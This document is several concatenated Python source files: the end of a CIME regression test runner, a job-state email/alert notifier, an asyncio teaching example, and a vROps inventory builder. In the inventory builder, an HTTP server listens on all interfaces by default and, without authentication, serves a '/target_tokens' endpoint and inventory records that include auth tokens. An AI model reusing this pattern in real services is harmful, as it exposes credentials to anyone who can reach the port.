xml1="""
<compiler>
<MPIFC>${SFC}</MPIFC>
</compiler>"""
xml2="""
<compiler MACH="{}">""".format(self.test_machine) + """
<SFC>${MPIFC}</SFC>
<MPIFC>mpif90</MPIFC>
</compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SFC", "mpif90")
tester.assert_variable_equals("MPIFC", "mpif90")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SFC", "mpif90")
tester.assert_variable_equals("MPIFC", "mpif90")
###############################################################################
class I_TestCMakeMacros(H_TestMakeMacros):
###############################################################################
"""CMake macros tests.
This class contains tests of the CMake output of Build.
    This class simply inherits all of the methods of H_TestMakeMacros, but changes
the definition of xml_to_tester to create a CMakeTester instead.
"""
def xml_to_tester(self, xml_string):
"""Helper that directly converts an XML string to a MakefileTester."""
test_xml = _wrap_config_compilers_xml(xml_string)
if (NO_CMAKE):
self.skipTest("Skipping cmake test")
else:
return CMakeTester(self, get_macros(self._maker, test_xml, "CMake"))
###############################################################################
class S_TestManageAndQuery(unittest.TestCase):
"""Tests various scripts to manage and query xml files"""
def _run_and_assert_query_testlist(self, extra_args=""):
"""Ensure that query_testlist runs successfully with the given extra arguments"""
files = Files()
testlist_drv = files.get_value("TESTS_SPEC_FILE", {"component":"drv"})
run_cmd_assert_result(self, "{}/query_testlists --xml-testlist {} {}".format(
SCRIPT_DIR, testlist_drv, extra_args))
def test_query_testlists_runs(self):
"""Make sure that query_testlists runs successfully
This simply makes sure that query_testlists doesn't generate any errors
when it runs. This helps ensure that changes in other utilities don't
break query_testlists.
"""
self._run_and_assert_query_testlist(extra_args="--show-options")
def test_query_testlists_define_testtypes_runs(self):
"""Make sure that query_testlists runs successfully with the --define-testtypes argument"""
self._run_and_assert_query_testlist(extra_args="--define-testtypes")
def test_query_testlists_count_runs(self):
"""Make sure that query_testlists runs successfully with the --count argument"""
self._run_and_assert_query_testlist(extra_args="--count")
def test_query_testlists_list_runs(self):
"""Make sure that query_testlists runs successfully with the --list argument"""
self._run_and_assert_query_testlist(extra_args="--list categories")
###############################################################################
class B_CheckCode(unittest.TestCase):
###############################################################################
# Tests are generated in the main loop below
longMessage = True
all_results = None
def make_pylint_test(pyfile, all_files):
def test(self):
if B_CheckCode.all_results is None:
B_CheckCode.all_results = check_code(all_files)
#pylint: disable=unsubscriptable-object
result = B_CheckCode.all_results[pyfile]
self.assertTrue(result == "", msg=result)
return test
def check_for_pylint():
#pylint: disable=import-error
from distutils.spawn import find_executable
pylint = find_executable("pylint")
if pylint is not None:
output = run_cmd_no_fail("pylint --version")
pylintver = re.search(r"pylint\s+(\d+)[.](\d+)[.](\d+)", output)
major = int(pylintver.group(1))
minor = int(pylintver.group(2))
if pylint is None or major < 1 or (major == 1 and minor < 5):
print("pylint version 1.5 or newer not found, pylint tests skipped")
return False
return True
def write_provenance_info():
curr_commit = get_current_commit(repo=LIB_DIR)
logging.info("\nTesting commit %s" % curr_commit)
cime_model = CIME.utils.get_model()
logging.info("Using cime_model = %s" % cime_model)
logging.info("Testing machine = %s" % MACHINE.get_machine_name())
if TEST_COMPILER is not None:
logging.info("Testing compiler = %s"% TEST_COMPILER)
if TEST_MPILIB is not None:
logging.info("Testing mpilib = %s"% TEST_MPILIB)
logging.info("Test root: %s" % TEST_ROOT)
logging.info("Test driver: %s\n" % CIME.utils.get_cime_default_driver())
def cleanup():
# if the TEST_ROOT directory exists and is empty, remove it
if os.path.exists(TEST_ROOT) and not os.listdir(TEST_ROOT):
print("All pass, removing directory:", TEST_ROOT)
os.rmdir(TEST_ROOT)
def _main_func(description):
global MACHINE
global NO_CMAKE
global FAST_ONLY
global NO_BATCH
global TEST_COMPILER
global TEST_MPILIB
global TEST_ROOT
global GLOBAL_TIMEOUT
global NO_TEARDOWN
config = CIME.utils.get_cime_config()
help_str = \
"""
{0} [TEST] [TEST]
OR
{0} --help
\033[1mEXAMPLES:\033[0m
\033[1;32m# Run the full suite \033[0m
> {0}
\033[1;32m# Run all code checker tests \033[0m
> {0} B_CheckCode
\033[1;32m# Run test test_wait_for_test_all_pass from class M_TestWaitForTests \033[0m
> {0} M_TestWaitForTests.test_wait_for_test_all_pass
""".format(os.path.basename(sys.argv[0]))
parser = argparse.ArgumentParser(usage=help_str,
description=description,
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--fast", action="store_true",
help="Skip full system tests, which saves a lot of time")
parser.add_argument("--no-batch", action="store_true",
help="Do not submit jobs to batch system, run locally."
" If false, will default to machine setting.")
parser.add_argument("--no-cmake", action="store_true",
help="Do not run cmake tests")
parser.add_argument("--no-teardown", action="store_true",
help="Do not delete directories left behind by testing")
parser.add_argument("--machine",
help="Select a specific machine setting for cime")
parser.add_argument("--compiler",
help="Select a specific compiler setting for cime")
parser.add_argument( "--mpilib",
help="Select a specific compiler setting for cime")
parser.add_argument( "--test-root",
help="Select a specific test root for all cases created by the testing")
parser.add_argument("--timeout", type=int,
help="Select a specific timeout for all tests")
ns, args = parser.parse_known_args()
# Now set the sys.argv to the unittest_args (leaving sys.argv[0] alone)
sys.argv[1:] = args
FAST_ONLY = ns.fast
NO_BATCH = ns.no_batch
NO_CMAKE = ns.no_cmake
GLOBAL_TIMEOUT = ns.timeout
NO_TEARDOWN = ns.no_teardown
if ns.machine is not None:
MACHINE = Machines(machine=ns.machine)
os.environ["CIME_MACHINE"] = ns.machine
elif "CIME_MACHINE" in os.environ:
mach_name = os.environ["CIME_MACHINE"]
MACHINE = Machines(machine=mach_name)
elif config.has_option("create_test", "MACHINE"):
MACHINE = Machines(machine=config.get("create_test", "MACHINE"))
elif config.has_option("main", "MACHINE"):
MACHINE = Machines(machine=config.get("main", "MACHINE"))
else:
MACHINE = Machines()
if ns.compiler is not None:
TEST_COMPILER = ns.compiler
elif config.has_option("create_test", "COMPILER"):
TEST_COMPILER = config.get("create_test", "COMPILER")
elif config.has_option("main", "COMPILER"):
TEST_COMPILER = config.get("main", "COMPILER")
if ns.mpilib is not None:
TEST_MPILIB = ns.mpilib
elif config.has_option("create_test", "MPILIB"):
TEST_MPILIB = config.get("create_test", "MPILIB")
elif config.has_option("main", "MPILIB"):
TEST_MPILIB = config.get("main", "MPILIB")
if ns.test_root is not None:
TEST_ROOT = ns.test_root
elif config.has_option("create_test", "TEST_ROOT"):
TEST_ROOT = config.get("create_test", "TEST_ROOT")
else:
TEST_ROOT = os.path.join(MACHINE.get_value("CIME_OUTPUT_ROOT"),
"scripts_regression_test.%s"% CIME.utils.get_timestamp())
args = lambda: None # just something to set attrs on
for log_param in ["debug", "silent", "verbose"]:
flag = "--%s" % log_param
if flag in sys.argv:
sys.argv.remove(flag)
setattr(args, log_param, True)
else:
setattr(args, log_param, False)
args = CIME.utils.parse_args_and_handle_standard_logging_options(args, None)
write_provenance_info()
atexit.register(cleanup)
# Find all python files in repo and create a pylint test for each
if check_for_pylint():
files_to_test = get_all_checkable_files()
for file_to_test in files_to_test:
pylint_test = make_pylint_test(file_to_test, files_to_test)
testname = "test_pylint_%s" % file_to_test.replace("/", "_").replace(".", "_")
expect(not hasattr(B_CheckCode, testname), "Repeat %s" % testname)
setattr(B_CheckCode, testname, pylint_test)
try:
unittest.main(verbosity=2, catchbreak=True)
except CIMEError as e:
if e.__str__() != "False":
print("Detected failures, leaving directory:", TEST_ROOT)
raise
if (__name__ == "__main__"):
_main_func(__doc__)
|
notify.py
|
#!/usr/bin/env python3
import threading
import time
import logging
import json
import smtplib
from queue import Queue
from queue import Empty
import requests
logger = logging.getLogger(__name__)
class NotifyMsg(object):
def __init__(self, email, alert_name):
self.email = email
self.alert_name = alert_name
def labels(self):
raise NotImplementedError()
def subject(self):
raise NotImplementedError()
def body(self):
return self.subject()
class JobStateChangedMsg(NotifyMsg):
def __init__(self, email, alert_name, job_name, job_state):
super(JobStateChangedMsg, self).__init__(email, alert_name)
self.job_name = job_name
self.job_state = job_state
def labels(self):
return {"job_name": self.job_name, "job_state": self.job_state}
def subject(self):
return "Your job %s has changed to state of %s" % (self.job_name,
self.job_state)
def new_job_state_change_message(email, job_name, state):
return JobStateChangedMsg(email, "job-state-changed", job_name, state)
class Notifier(object):
def __init__(self, config):
self.queue = Queue()
self.running = False
self.thread = None
self.cluster = None
self.alert_manager_url = None
self.smtp_url = self.smtp_from = self.smtp_auth_name = self.smtp_auth_pass = None
if config is not None and "notifier" in config:
notifier_config = config["notifier"]
self.cluster = notifier_config.get("cluster")
self.smtp_url = notifier_config.get("smtp-url")
self.smtp_from = notifier_config.get("smtp-from")
self.smtp_auth_name = notifier_config.get("smtp-auth-username")
self.smtp_auth_pass = notifier_config.get("smtp-auth-password")
alert_manager_url = notifier_config.get("alert-manager-url")
if alert_manager_url is not None and len(alert_manager_url) > 0:
if alert_manager_url[-1] == "/":
self.alert_manager_url = alert_manager_url + "api/v1/alerts"
else:
self.alert_manager_url = alert_manager_url + "/api/v1/alerts"
if self.cluster is None or \
self.alert_manager_url is None and (
self.smtp_url is None or
self.smtp_from is None or
self.smtp_auth_name is None or
self.smtp_auth_pass is None):
logger.warning("Notifier not configured")
def start(self):
if not self.running:
self.running = True
self.thread = threading.Thread(target=self.process, name="notifier")
self.thread.start()
def stop(self):
if self.running:
self.running = False
self.thread.join()
self.thread = None
def notify(self, msg):
self.queue.put(msg)
def process(self):
while self.running:
try:
msg = self.queue.get(block=True, timeout=1) # 1s timeout
except Empty:
continue
retry_count = 0
sent = False
while retry_count < 3:
if self.send(msg):
sent = True
break
time.sleep(0.2)
retry_count += 1
if not sent:
logger.error("failed to send out, discard msg: %s", msg)
def send(self, msg):
subject = msg.subject()
try:
if self.alert_manager_url is not None:
labels = msg.labels()
labels.update({
"alertname": msg.alert_name,
"type": "user_alert",
"cluster": self.cluster,
"user_email": msg.email,
"subject": subject,
})
resp = requests.post(self.alert_manager_url,
timeout=5,
data=json.dumps([{
"labels": labels
}]))
resp.raise_for_status()
return True
elif self.smtp_url is not None and \
self.smtp_from is not None and \
self.smtp_auth_name is not None and \
self.smtp_auth_pass is not None:
smtp_send_email(self.smtp_url, self.smtp_from,
self.smtp_auth_name, self.smtp_auth_pass,
msg.email, subject, msg.body())
return True
else:
# not configured, discard message
return True
        except Exception:
logger.exception("sending email failed")
return False
def smtp_send_email(smtp_url, smtp_from, smtp_auth_name, smtp_auth_pass, to,
subject, body):
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n%s" % (smtp_from, to,
subject, body)
conn = smtplib.SMTP(smtp_url)
conn.starttls()
conn.login(smtp_auth_name, smtp_auth_pass)
conn.sendmail(smtp_from, to, msg)
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
level=logging.INFO)
notifier = Notifier({
"notifier": {
"cluster": "local",
"alert-manager-url": "http://localhost:9093/alert-manager"
}
})
notifier.start()
notifier.notify(
new_job_state_change_message("dixu@microsoft.com", "job-id", "stopped"))
notifier.stop()
|
Chapter16_AsyncIO_01.py
|
# coding=utf-8
import threading
import time
def get_body(i):
print("start", i)
time.sleep(2)
print("end", i)
for i in range(5):
t = threading.Thread(target=get_body, args=(i,))
t.start()
# ### Processes and threads
# A process is a running instance of an application; it owns its code, open file resources, data resources and an independent memory space, and it is the smallest unit of resource allocation;
# A thread belongs to a process and is contained in it as a single sequential flow of control; it is the actual unit of execution inside the process and has its own stack space;
# A thread is the smallest unit that the operating system can schedule for CPU execution;
# A process contains at least one main thread and may run multiple threads concurrently, each executing a different task;
# In short, from the operating system's point of view, a thread is the smallest unit of execution and a process is the smallest unit of resource management;
# Compared with processes, threads are easier to schedule, have lower overhead and help improve concurrency;
#
# ### How multiple threads are executed
# The Python virtual machine executes them as follows:
# 1. Acquire the GIL;
# 2. Switch to a thread and run it;
# 3. Run a fixed number of bytecode instructions, or until the thread voluntarily gives up control (e.g. by calling time.sleep(0));
# 4. Put the thread to sleep;
# 5. Release the GIL;
# 6. Repeat all of the above steps;
#
# ### GIL (Global Interpreter Lock)
# Because of the GIL, only one thread can run inside the interpreter main loop (the Python virtual machine) at any given moment;
# The GIL is not a feature of the Python language; it is a concept introduced by CPython, the reference interpreter implementation, and Jython, for example, has no GIL;
# In other words, multithreading in CPython does not provide true parallelism;
#
# ### Task types
# In Python, concurrency can be implemented in three ways: threads (threading), multiple processes (multiprocessing) and asyncio;
# Different approaches suit different task types and scenarios;
# CPU-bound (compute-intensive) tasks: because of the GIL, these are usually handled with multiprocessing;
# IO-bound tasks:
# - use thread scheduling so that a thread releases the GIL while performing IO, which gives apparent concurrency;
# - use coroutines ("concurrency" running inside a single thread);
#
# ### Coroutines
# A coroutine is an even more lightweight construct than a thread; one thread can host many coroutines;
# Coroutines are controlled entirely by the program (they run in user space) rather than being managed by the operating system kernel, which greatly improves performance and avoids the cost of thread context switches.
#
# ### Multiprocessing, multithreading and coroutines for concurrency
# Multiprocessing, multithreading and coroutines can all be used to run concurrent tasks, but coroutines are the most efficient;
# - for multiprocessing and multithreading, IO scheduling is decided by the operating system;
# - for coroutines, IO scheduling comes from the user, who can yield a state from inside a function;
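# ----------------------------------------------------------------------------
# Illustrative addition (not part of the original notes): a minimal asyncio
# sketch that mirrors the threading example at the top of this file. The five
# coroutines run cooperatively inside a single thread; each `await
# asyncio.sleep(2)` yields control back to the event loop, so the whole batch
# still finishes in roughly 2 seconds without using extra threads.
import asyncio

async def get_body_async(i):
    print("start", i)
    await asyncio.sleep(2)  # non-blocking sleep: lets the other coroutines run
    print("end", i)

async def main():
    # schedule all five coroutines and wait for them to complete
    await asyncio.gather(*(get_body_async(i) for i in range(5)))

asyncio.run(main())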
|
InventoryBuilder.py
|
from flask import Flask
from gevent.pywsgi import WSGIServer
from threading import Thread
from resources.Resourceskinds import NSXTMgmtPlane
from tools.Vrops import Vrops
import time
import json
import os
import logging
logger = logging.getLogger('vrops-exporter')
class InventoryBuilder:
def __init__(self, atlas_config, port, sleep, timeout):
self.atlas_config = atlas_config
self.port = int(port)
self.sleep = sleep
self.timeout = int(timeout)
self._user = os.environ["USER"]
self._password = os.environ["PASSWORD"]
self.vcenter_dict = dict()
self.nsxt_dict = dict()
self.target_tokens = dict()
self.iterated_inventory = dict()
self.vrops_collection_times = dict()
self.response_codes = dict()
self.alertdefinitions = dict()
self.successful_iteration_list = [0]
self.wsgi_address = '0.0.0.0'
if 'LOOPBACK' in os.environ:
if os.environ['LOOPBACK'] == '1':
self.wsgi_address = '127.0.0.1'
thread = Thread(target=self.run_rest_server)
thread.start()
self.query_inventory_permanent()
def run_rest_server(self):
app = Flask(__name__)
logger.info(f'serving /vrops_list on {self.port}')
@app.route('/vrops_list', methods=['GET'])
def vrops_list():
return json.dumps(self.vrops_list)
logger.info(f'serving /inventory on {self.port}')
@app.route('/<target>/vcenters/<int:iteration>', methods=['GET'])
def vcenters(target, iteration):
return self.iterated_inventory[str(iteration)]['vcenters'].get(target, {})
@app.route('/<target>/datacenters/<int:iteration>', methods=['GET'])
def datacenters(target, iteration):
return self.iterated_inventory[str(iteration)]['datacenters'].get(target, {})
@app.route('/<target>/clusters/<int:iteration>', methods=['GET'])
def clusters(target, iteration):
return self.iterated_inventory[str(iteration)]['clusters'].get(target, {})
@app.route('/<target>/hosts/<int:iteration>', methods=['GET'])
def hosts(target, iteration):
return self.iterated_inventory[str(iteration)]['hosts'].get(target, {})
@app.route('/<target>/datastores/<int:iteration>', methods=['GET'])
def datastores(target, iteration):
return self.iterated_inventory[str(iteration)]['datastores'].get(target, {})
@app.route('/<target>/vms/<int:iteration>', methods=['GET'])
def vms(target, iteration):
return self.iterated_inventory[str(iteration)]['vms'].get(target, {})
@app.route('/<target>/nsxt_adapter/<int:iteration>', methods=['GET'])
def nsxt_adapter(target, iteration):
return self.iterated_inventory[str(iteration)]['nsxt_adapter'].get(target, {})
@app.route('/<target>/nsxt_mgmt_cluster/<int:iteration>', methods=['GET'])
def nsxt_mgmt_cluster(target, iteration):
return self.iterated_inventory[str(iteration)]['nsxt_mgmt_cluster'].get(target, {})
@app.route('/<target>/nsxt_mgmt_nodes/<int:iteration>', methods=['GET'])
def nsxt_mgmt_nodes(target, iteration):
return self.iterated_inventory[str(iteration)]['nsxt_mgmt_nodes'].get(target, {})
@app.route('/<target>/nsxt_mgmt_service/<int:iteration>', methods=['GET'])
def nsxt_mgmt_service(target, iteration):
return self.iterated_inventory[str(iteration)]['nsxt_mgmt_service'].get(target, {})
@app.route('/alertdefinitions/', methods=['GET'])
def alert_alertdefinitions():
return self.alertdefinitions
@app.route('/iteration', methods=['GET'])
def iteration():
return_iteration = self.successful_iteration_list[-1]
return str(return_iteration)
@app.route('/collection_times', methods=['GET'])
def collection_times():
vrops_collection_times = self.vrops_collection_times
return json.dumps(vrops_collection_times)
@app.route('/api_response_codes', methods=['GET'])
def api_response_codes():
response_codes = self.response_codes
return json.dumps(response_codes)
# debugging purpose
@app.route('/iteration_store', methods=['GET'])
def iteration_store():
return_iteration = self.successful_iteration_list
return json.dumps(return_iteration)
# FIXME: this could basically be the always active token list. no active token? refresh!
@app.route('/target_tokens', methods=['GET'])
def token():
return json.dumps(self.target_tokens)
try:
if logger.level == 10:
                # WSGI is logging on DEBUG level
WSGIServer((self.wsgi_address, self.port), app).serve_forever()
else:
WSGIServer((self.wsgi_address, self.port), app, log=None).serve_forever()
except TypeError as e:
logger.error('Problem starting server, you might want to try LOOPBACK=0 or LOOPBACK=1')
logger.error(f'Current used options: {self.wsgi_address} on port {self.port}')
logger.error(f'TypeError: {e}')
def get_vrops(self):
with open(self.atlas_config) as json_file:
netbox_json = json.load(json_file)
self.vrops_list = [target['labels']['server_name'] for target in netbox_json if
target['labels']['job'] == "vrops"]
def query_inventory_permanent(self):
        # The first iteration to be filled is 1. While it is not ready yet,
        # a curl to /iteration still reports 0, telling clients to wait for actual data.
self.iteration = 1
while True:
# get vrops targets every run in case we have new targets appearing
self.get_vrops()
if len(self.successful_iteration_list) > 3:
iteration_to_be_deleted = self.successful_iteration_list.pop(0)
# initial case, since 0 is never filled in iterated_inventory
if iteration_to_be_deleted == 0:
continue
self.iterated_inventory.pop(str(iteration_to_be_deleted))
logger.debug(f'deleting iteration {iteration_to_be_deleted}')
# initialize empty inventory per iteration
self.iterated_inventory[str(self.iteration)] = dict()
logger.info(f'real run {self.iteration}')
threads = list()
for vrops in self.vrops_list:
self.response_codes[vrops] = dict()
vrops_short_name = vrops.split('.')[0]
thread = Thread(target=self.query_vrops, args=(vrops, vrops_short_name, self.iteration))
thread.start()
threads.append((thread, vrops))
timeout = self.timeout
timeout_reached = False
start_time = time.time()
current_time = start_time
joined_threads = dict()
while current_time <= (start_time + timeout):
for t in threads:
if not t[0].is_alive():
t[0].join()
                        if t[1] not in joined_threads:
joined_threads.setdefault(t[1], round(time.time() - start_time))
if len(joined_threads.keys()) >= len(threads):
break
time.sleep(1)
current_time = time.time()
else:
still_running = [t for t in threads if t[0].is_alive()]
for running_thread in still_running:
logger.info(f"Timeout {timeout}s reached for fetching {running_thread[1]}")
running_thread[0].join(0)
timeout_reached = True
for vrops in joined_threads:
self.vrops_collection_times[vrops] = joined_threads[vrops]
logger.info(f"Fetched {vrops} in {joined_threads[vrops]}s")
self.provide_vcenters()
self.provide_datacenters()
self.provide_clusters()
self.provide_hosts()
self.provide_datastores()
self.provide_vms()
self.provide_nsxt_adapter()
self.provide_nsxt_mgmt_cluster()
self.provide_nsxt_mgmt_nodes()
self.provide_nsxt_mgmt_service()
if len(self.iterated_inventory[str(self.iteration)]['vcenters']) > 0:
self.successful_iteration_list.append(self.iteration)
else:
# immediately withdraw faulty inventory
logger.debug(f'Withdrawing current iteration: {self.iteration}')
self.iterated_inventory.pop(str(self.iteration))
self.iteration += 1
if not timeout_reached:
logger.info(f'Inventory relaxing before going to work again in {self.sleep}s')
time.sleep(int(self.sleep))
def query_vrops(self, target, vrops_short_name, iteration):
vrops = Vrops()
logger.info(f'Querying {target}')
token, self.response_codes[target]["token"] = Vrops.get_token(target=target)
if not token:
logger.warning(f'retrying connection to {target} in next iteration {self.iteration + 1}')
return False
self.target_tokens[target] = token
logger.info(f'########## Collecting resources {vrops_short_name}... ##########')
vcenter = self.create_vcenter_objects(vrops, target, token)
nsxt_adapter = self.create_nsxt_objects(vrops, target, token)
self.vcenter_dict[vrops] = vcenter
self.nsxt_dict[vrops] = nsxt_adapter
if iteration == 1:
self.alertdefinitions = Vrops.get_alertdefinitions(vrops, target, token)
return True
def create_vcenter_objects(self, vrops, target: str, token: str):
vcenter_adapter, self.response_codes[target]["vcenter"] = Vrops.get_vcenter_adapter(vrops, target, token)
        if not vcenter_adapter:
            logger.critical('Could not get vcenter adapter!')
            return False
        # just one vcenter adapter is supported, so use the first entry
        vcenter_adapter = vcenter_adapter[0]
logger.debug(f'Collecting vcenter: {vcenter_adapter.name}')
datacenter, self.response_codes[target]["datacenters"] = \
Vrops.get_datacenter(vrops, target, token, [vcenter_adapter.uuid])
cluster, self.response_codes[target]["clusters"] = \
Vrops.get_cluster(vrops, target, token, [dc.uuid for dc in datacenter])
datastores, self.response_codes[target]["datastores"] = \
Vrops.get_datastores(vrops, target, token, [dc.uuid for dc in datacenter])
hosts, self.response_codes[target]["hosts"] = \
Vrops.get_hosts(vrops, target, token, [cl.uuid for cl in cluster])
vms, self.response_codes[target]["vms"] = \
Vrops.get_vms(vrops, target, token, [hs.uuid for hs in hosts], vcenter_adapter.uuid)
for dc in datacenter:
vcenter_adapter.add_datacenter(dc)
for dc_object in vcenter_adapter.datacenter:
logger.debug(f'Collecting datacenter: {dc_object.name}')
for ds in datastores:
if ds.parent == dc_object.uuid:
dc_object.add_datastore(ds)
logger.debug(f'Collecting datastore: {ds.name}')
for cl in cluster:
dc_object.add_cluster(cl)
for cl_object in dc_object.clusters:
logger.debug(f'Collecting cluster: {cl_object.name}')
for hs in hosts:
if hs.parent == cl_object.uuid:
cl_object.add_host(hs)
for hs_object in cl_object.hosts:
logger.debug(f'Collecting host: {hs_object.name}')
for vm in vms:
if vm.parent == hs_object.uuid:
hs_object.add_vm(vm)
logger.debug(f'Collecting VM: {vm.name}')
return vcenter_adapter
def create_nsxt_objects(self, vrops, target: str, token: str):
nsxt_adapter, self.response_codes[target]["nsxt_adapter"] = Vrops.get_nsxt_adapter(vrops, target, token)
if not nsxt_adapter:
return False
nsxt_mgmt_plane = NSXTMgmtPlane(target, token)
for adapter in nsxt_adapter:
logger.debug(f'Collecting NSX-T adapter: {adapter.name}')
nsxt_mgmt_plane.add_adapter(adapter)
nsxt_mgmt_cluster, self.response_codes[target]["nsxt_mgmt_cluster"] = \
            Vrops.get_nsxt_mgmt_cluster(vrops, target, token, [a.uuid for a in nsxt_adapter])
nsxt_mgmt_nodes, self.response_codes[target]["nsxt_mgmt_nodes"] = \
Vrops.get_nsxt_mgmt_nodes(vrops, target, token, [c.uuid for c in nsxt_mgmt_cluster])
nsxt_mgmt_service, self.response_codes[target]["nsxt_mgmt_services"] = \
Vrops.get_nsxt_mgmt_service(vrops, target, token, [n.uuid for n in nsxt_mgmt_nodes])
for nsxt_adapter_object in nsxt_mgmt_plane.adapter:
for mgmt_cluster in nsxt_mgmt_cluster:
if mgmt_cluster.parent == nsxt_adapter_object.uuid:
nsxt_adapter_object.add_mgmt_cluster(mgmt_cluster)
logger.debug(f'Collecting NSX-T management cluster: {mgmt_cluster.name}')
for mgmt_cluster_object in nsxt_adapter_object.management_cluster:
for mgmt_node in nsxt_mgmt_nodes:
if mgmt_node.parent == mgmt_cluster_object.uuid:
mgmt_cluster_object.add_mgmt_node(mgmt_node)
logger.debug(f'Collecting NSX-T management node: {mgmt_node.name}')
for nsxt_mgmt_node in mgmt_cluster_object.management_nodes:
for mgmt_service_instance in nsxt_mgmt_service:
if mgmt_service_instance.parent == nsxt_mgmt_node.uuid:
nsxt_mgmt_node.add_mgmt_service(mgmt_service_instance)
logger.debug(f'Collecting NSX-T management service: {mgmt_service_instance.name}')
return nsxt_mgmt_plane
def provide_vcenters(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
tree[vcenter.target][vcenter.uuid] = {
'uuid': vcenter.uuid,
'name': vcenter.name,
'kind_dc_name': dc.name,
'kind_dc_uuid': dc.uuid,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['vcenters'] = tree
return tree
def provide_datacenters(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
tree[vcenter.target][dc.uuid] = {
'uuid': dc.uuid,
'name': dc.name,
'parent_vcenter_uuid': vcenter.uuid,
'parent_vcenter_name': vcenter.name,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['datacenters'] = tree
return tree
def provide_datastores(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
for datastore in dc.datastores:
tree[vcenter.target][datastore.uuid] = {
'uuid': datastore.uuid,
'name': datastore.name,
'parent_dc_uuid': dc.uuid,
'parent_dc_name': dc.name,
'type': datastore.type,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['datastores'] = tree
return tree
def provide_clusters(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
for cluster in dc.clusters:
tree[vcenter.target][cluster.uuid] = {
'uuid': cluster.uuid,
'name': cluster.name,
'parent_dc_uuid': dc.uuid,
'parent_dc_name': dc.name,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['clusters'] = tree
return tree
def provide_hosts(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
for cluster in dc.clusters:
for host in cluster.hosts:
tree[vcenter.target][host.uuid] = {
'uuid': host.uuid,
'name': host.name,
'parent_cluster_uuid': cluster.uuid,
'parent_cluster_name': cluster.name,
'datacenter': dc.name,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['hosts'] = tree
return tree
def provide_vms(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
for cluster in dc.clusters:
for host in cluster.hosts:
for vm in host.vms:
tree[vcenter.target][vm.uuid] = {
'uuid': vm.uuid,
'name': vm.name,
'parent_host_uuid': host.uuid,
'parent_host_name': host.name,
'cluster': cluster.name,
'datacenter': dc.name,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['vms'] = tree
return tree
def provide_nsxt_adapter(self) -> dict:
tree = dict()
for nsxt_entry in self.nsxt_dict:
nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry]
if not nsxt_mgmt_plane:
continue
tree[nsxt_mgmt_plane.target] = dict()
for nsxt_adapter in nsxt_mgmt_plane.adapter:
tree[nsxt_mgmt_plane.target][nsxt_adapter.uuid] = {
'uuid': nsxt_adapter.uuid,
'name': nsxt_adapter.name,
'target': nsxt_mgmt_plane.target,
'token': nsxt_mgmt_plane.token,
}
self.iterated_inventory[str(self.iteration)]['nsxt_adapter'] = tree
return tree
def provide_nsxt_mgmt_cluster(self) -> dict:
tree = dict()
for nsxt_entry in self.nsxt_dict:
nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry]
if not nsxt_mgmt_plane:
continue
tree[nsxt_mgmt_plane.target] = dict()
for nsxt_adapter in nsxt_mgmt_plane.adapter:
for mgmt_cluster in nsxt_adapter.management_cluster:
tree[nsxt_mgmt_plane.target][mgmt_cluster.uuid] = {
'uuid': mgmt_cluster.uuid,
'name': mgmt_cluster.name,
'nsxt_adapter_name': nsxt_adapter.name,
'nsxt_adapter_uuid': nsxt_adapter.uuid,
'target': nsxt_mgmt_plane.target,
'token': nsxt_mgmt_plane.token,
}
self.iterated_inventory[str(self.iteration)]['nsxt_mgmt_cluster'] = tree
return tree
def provide_nsxt_mgmt_nodes(self) -> dict:
tree = dict()
for nsxt_entry in self.nsxt_dict:
nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry]
if not nsxt_mgmt_plane:
continue
tree[nsxt_mgmt_plane.target] = dict()
for nsxt_adapter_object in nsxt_mgmt_plane.adapter:
for mgmt_cluster in nsxt_adapter_object.management_cluster:
for mgmt_node in mgmt_cluster.management_nodes:
tree[nsxt_mgmt_plane.target][mgmt_node.uuid] = {
'uuid': mgmt_node.uuid,
'name': mgmt_node.name,
'mgmt_cluster_name': mgmt_cluster.name,
'mgmt_cluster_uuid': mgmt_cluster.uuid,
'nsxt_adapter_name': nsxt_adapter_object.name,
'nsxt_adapter_uuid': nsxt_adapter_object.uuid,
'target': nsxt_mgmt_plane.target,
'token': nsxt_mgmt_plane.token,
}
self.iterated_inventory[str(self.iteration)]['nsxt_mgmt_nodes'] = tree
return tree
def provide_nsxt_mgmt_service(self) -> dict:
tree = dict()
for nsxt_entry in self.nsxt_dict:
nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry]
if not nsxt_mgmt_plane:
continue
